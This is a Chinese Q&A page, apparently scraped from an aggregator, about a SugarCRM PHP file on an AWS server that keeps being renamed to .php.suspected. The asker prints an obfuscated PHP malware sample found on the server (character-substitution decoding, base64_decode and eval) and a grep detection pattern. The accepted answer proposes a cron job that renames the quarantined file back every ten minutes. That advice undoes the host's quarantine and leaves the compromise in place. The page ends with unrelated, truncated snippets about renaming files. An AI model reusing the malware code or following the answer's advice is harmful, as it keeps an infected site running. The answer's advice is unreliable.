php文件自动重命名为php.suspected
从最近4天开始,我们在生产服务器(AWS EC2实例)上面临一个奇怪的问题,该服务器仅针对一个站点,即SugarCRM。
问题是 /home/site_folder/public_html/include/MassUpdate.php 文件自动重命名为
/home/site_folder/public_html/include/MassUpdate.php.suspected
一天发生2-3次,间隔3-4小时。仅在特定站点的情况下才会发生此问题,即使在暂存同一站点的副本时也不会发生。我什至从两个站点都检查了该文件的代码,这是相同的。
我们已经在Google上搜索并发现,此类问题主要发生在Wordpress网站上,可能是由于受到攻击所致。但是我们检查了服务器是否受到了攻击,没有任何攻击。此外,服务器上也没有运行病毒/恶意软件扫描。
我们应该做什么?
更新: 通过 执行此链接后,我们发现了很少的内容。执行egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/并发现,带有以下示例代码的文件很少。
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
似乎有些恶意软件,我们如何将其永久删除?
谢谢
问题答案:
发布此答案可能会对他人有所帮助。
- 在方便的位置创建一个扩展名为 ‘.sh’ 的文件。
- 在其中添加以下代码。
#Rename your_file_name.php.suspected to your_file_name.php mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php
- 保存此文件。
- 使用crontab中的以下行,每10分钟(或您需要的任何间隔)设置cron
*/10 * * * * path_to_cron_file.sh
- 重新启动crontab服务。
您将获得有关在Google上创建cron的大量文档。
-
本文向大家介绍PHP自动重命名文件实现方法,包括了PHP自动重命名文件实现方法的使用技巧和注意事项,需要的朋友参考一下 本文实例讲述了PHP自动重命名文件实现方法。分享给大家供大家参考。具体方法分析如下: PHP重命名文件名我们在实际开发过程中经常会使用到,比如用户上传文件或是一些缓存文件自动生成的功能我们都需要使用到自动重命名功能。但一般我们在制作上传文件时命名方式都是使用取系统当前时间加上随时
-
文件重命名 文件重命名 源码/* * Copyright (c) 2006-2018, RT-Thread Development Team * * SPDX-License-Identifier: Apache-2.0 * * Change Logs: * Date Author Notes * *//* * 程序清单:更改名称 * * 程序会创建一个操作文件的函数并导出到msh命令列表 * 在
-
问题内容: 我有大量的格式文件,以及。 如何重命名这些文件,使它们全部为大写,而忽略名称的数字部分? 问题答案:
-
问题内容: 我想批量重命名目录中的多个文件,以便从文件名中删除前面的数字和连字符。 如何使用linux命令执行此操作? 问题答案: 这应该使它: 它从块的开头(即数字)开始多次,然后连字符并将其从文件名中删除。 如果不在您的计算机中,则可以使用循环和: 测试 要么:
-
问题内容: 我需要有关bash脚本的帮助。脚本需要将目录中的所有文件重命名为其md5 sum +扩展名。 我在下面找到了bash脚本,但是需要对其进行更改,以便添加扩展名。 问题答案: 这可能对您有用: 或者GNU sed可以做的更短:
-
我一直在使用PDF文件中的命名目标来打开文件中特定位置的PDF文件。负责生成PDF文档的团队使用工具从图书标记自动生成命名目的地,因此命名目的地的名称往往类似于*9\u Glossary*或*Additional\u Information*。我们被要求用多种语言制作相同的文档。我预计我们将收到多种外语的PDF文档,在相同的位置带有书签,但图书标记的名称当然将使用这些其他语言,自动生成的命名目的地